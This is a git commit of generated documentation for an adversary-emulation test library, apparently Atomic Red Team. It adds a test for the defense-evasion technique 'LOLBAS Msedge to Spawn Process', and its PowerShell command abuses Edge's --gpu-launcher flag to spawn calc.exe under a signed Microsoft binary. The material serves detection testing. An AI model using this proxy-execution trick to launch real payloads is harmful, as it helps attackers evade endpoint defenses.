Generated docs from job=generate-docs branch=master [ci skip]

2024-01-03 22:12:30 +00:00
parent cb9433117b
commit 49f738b461
9 changed files with 107 additions and 2 deletions
@@ -192,6 +192,7 @@ defense-evasion,T1218,Signed Binary Proxy Execution,11,Lolbin Gpscript startup o
 defense-evasion,T1218,Signed Binary Proxy Execution,12,Lolbas ie4uinit.exe use as proxy,13c0804e-615e-43ad-b223-2dfbacd0b0b3,command_prompt
 defense-evasion,T1218,Signed Binary Proxy Execution,13,LOLBAS CustomShellHost to Spawn Process,b1eeb683-90bb-4365-bbc2-2689015782fe,powershell
 defense-evasion,T1218,Signed Binary Proxy Execution,14,Provlaunch.exe Executes Arbitrary Command via Registry Key,ab76e34f-28bf-441f-a39c-8db4835b89cc,command_prompt
+defense-evasion,T1218,Signed Binary Proxy Execution,15,LOLBAS Msedge to Spawn Process,e5eedaed-ad42-4c1e-8783-19529738a349,powershell
 defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,1,Set a file's access timestamp,5f9113d5-ed75-47ed-ba23-ea3573d05810,sh
 defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,2,Set a file's modification timestamp,20ef1523-8758-4898-b5a2-d026cc3d2c52,sh
 defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,3,Set a file's creation timestamp,8164a4a6-f99c-4661-ac4f-80f5e4e78d2b,sh
@@ -116,6 +116,7 @@ defense-evasion,T1218,Signed Binary Proxy Execution,11,Lolbin Gpscript startup o
 defense-evasion,T1218,Signed Binary Proxy Execution,12,Lolbas ie4uinit.exe use as proxy,13c0804e-615e-43ad-b223-2dfbacd0b0b3,command_prompt
 defense-evasion,T1218,Signed Binary Proxy Execution,13,LOLBAS CustomShellHost to Spawn Process,b1eeb683-90bb-4365-bbc2-2689015782fe,powershell
 defense-evasion,T1218,Signed Binary Proxy Execution,14,Provlaunch.exe Executes Arbitrary Command via Registry Key,ab76e34f-28bf-441f-a39c-8db4835b89cc,command_prompt
+defense-evasion,T1218,Signed Binary Proxy Execution,15,LOLBAS Msedge to Spawn Process,e5eedaed-ad42-4c1e-8783-19529738a349,powershell
 defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,5,Windows - Modify file creation timestamp with PowerShell,b3b2c408-2ff0-4a33-b89b-1cb46a9e6a9c,powershell
 defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,6,Windows - Modify file last modified timestamp with PowerShell,f8f6634d-93e1-4238-8510-f8a90a20dcf2,powershell
 defense-evasion,T1070.006,Indicator Removal on Host: Timestomp,7,Windows - Modify file last access timestamp with PowerShell,da627f63-b9bd-4431-b6f8-c5b44d061a62,powershell
@@ -244,6 +244,7 @@
  - Atomic Test #12: Lolbas ie4uinit.exe use as proxy [windows]
  - Atomic Test #13: LOLBAS CustomShellHost to Spawn Process [windows]
  - Atomic Test #14: Provlaunch.exe Executes Arbitrary Command via Registry Key [windows]
+  - Atomic Test #15: LOLBAS Msedge to Spawn Process [windows]
 - [T1070.006 Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md)
  - Atomic Test #1: Set a file's access timestamp [linux, macos]
  - Atomic Test #2: Set a file's modification timestamp [linux, macos]
@@ -157,6 +157,7 @@
  - Atomic Test #12: Lolbas ie4uinit.exe use as proxy [windows]
  - Atomic Test #13: LOLBAS CustomShellHost to Spawn Process [windows]
  - Atomic Test #14: Provlaunch.exe Executes Arbitrary Command via Registry Key [windows]
+  - Atomic Test #15: LOLBAS Msedge to Spawn Process [windows]
 - [T1070.006 Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md)
  - Atomic Test #5: Windows - Modify file creation timestamp with PowerShell [windows]
  - Atomic Test #6: Windows - Modify file last modified timestamp with PowerShell [windows]
@@ -9210,6 +9210,33 @@ defense-evasion:
          reg add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1\dummy2 /v Commandline /d calc.exe
          c:\windows\system32\provlaunch.exe LOLBin
        name: command_prompt
+    - name: LOLBAS Msedge to Spawn Process
+      auto_generated_guid: e5eedaed-ad42-4c1e-8783-19529738a349
+      description: |
+        Executes a process under a trusted Microsoft signed binary,mseddge. This test will spawn "calc.exe" as a child process of msedge.exe
+        - https://lolbas-project.github.io/lolbas/Binaries/Msedge/
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          $edgePath64 = "C:\Program Files\Microsoft\Edge\Application\msedge.exe"
+          if (Test-Path $edgePath64) {
+              $edgePath = $edgePath64
+          } else {
+              # Check 32-bit Edge installation path
+              $edgePath32 = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
+              if (Test-Path $edgePath32) {
+                  $edgePath = $edgePath32
+              } else {
+                  exit 1
+              }
+          }
+          & $edgePath --disable-gpu-sandbox --gpu-launcher="C:\\Windows\\System32\\calc.exe &&"
+          sleep 5
+          taskkill -f -im msedge.exe
+          taskkill -f -im calc.exe
+          taskkill -f -im win32calc.exe
+        name: powershell
  T1070.006:
    technique:
      x_mitre_platforms:
@@ -7188,6 +7188,33 @@ defense-evasion:
          reg add HKLM\SOFTWARE\Microsoft\Provisioning\Commands\LOLBin\dummy1\dummy2 /v Commandline /d calc.exe
          c:\windows\system32\provlaunch.exe LOLBin
        name: command_prompt
+    - name: LOLBAS Msedge to Spawn Process
+      auto_generated_guid: e5eedaed-ad42-4c1e-8783-19529738a349
+      description: |
+        Executes a process under a trusted Microsoft signed binary,mseddge. This test will spawn "calc.exe" as a child process of msedge.exe
+        - https://lolbas-project.github.io/lolbas/Binaries/Msedge/
+      supported_platforms:
+      - windows
+      executor:
+        command: |
+          $edgePath64 = "C:\Program Files\Microsoft\Edge\Application\msedge.exe"
+          if (Test-Path $edgePath64) {
+              $edgePath = $edgePath64
+          } else {
+              # Check 32-bit Edge installation path
+              $edgePath32 = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
+              if (Test-Path $edgePath32) {
+                  $edgePath = $edgePath32
+              } else {
+                  exit 1
+              }
+          }
+          & $edgePath --disable-gpu-sandbox --gpu-launcher="C:\\Windows\\System32\\calc.exe &&"
+          sleep 5
+          taskkill -f -im msedge.exe
+          taskkill -f -im calc.exe
+          taskkill -f -im win32calc.exe
+        name: powershell
  T1070.006:
    technique:
      x_mitre_platforms:
@@ -34,6 +34,8 @@ Similarly, on Linux systems adversaries may abuse trusted binaries such as <code

 - [Atomic Test #14 - Provlaunch.exe Executes Arbitrary Command via Registry Key](#atomic-test-14---provlaunchexe-executes-arbitrary-command-via-registry-key)

+- [Atomic Test #15 - LOLBAS Msedge to Spawn Process](#atomic-test-15---lolbas-msedge-to-spawn-process)
+

 <br/>

@@ -679,4 +681,49 @@ c:\windows\system32\provlaunch.exe LOLBin



+<br/>
+<br/>
+
+## Atomic Test #15 - LOLBAS Msedge to Spawn Process
+Executes a process under a trusted Microsoft signed binary,mseddge. This test will spawn "calc.exe" as a child process of msedge.exe
+- https://lolbas-project.github.io/lolbas/Binaries/Msedge/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** e5eedaed-ad42-4c1e-8783-19529738a349
+
+
+
+
+
+
+#### Attack Commands: Run with `powershell`! 
+
+
+```powershell
+$edgePath64 = "C:\Program Files\Microsoft\Edge\Application\msedge.exe"
+if (Test-Path $edgePath64) {
+    $edgePath = $edgePath64
+} else {
+    # Check 32-bit Edge installation path
+    $edgePath32 = "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
+    if (Test-Path $edgePath32) {
+        $edgePath = $edgePath32
+    } else {
+        exit 1
+    }
+}
+& $edgePath --disable-gpu-sandbox --gpu-launcher="C:\\Windows\\System32\\calc.exe &&"
+sleep 5
+taskkill -f -im msedge.exe
+taskkill -f -im calc.exe
+taskkill -f -im win32calc.exe
+```
+
+
+
+
+
+
 <br/>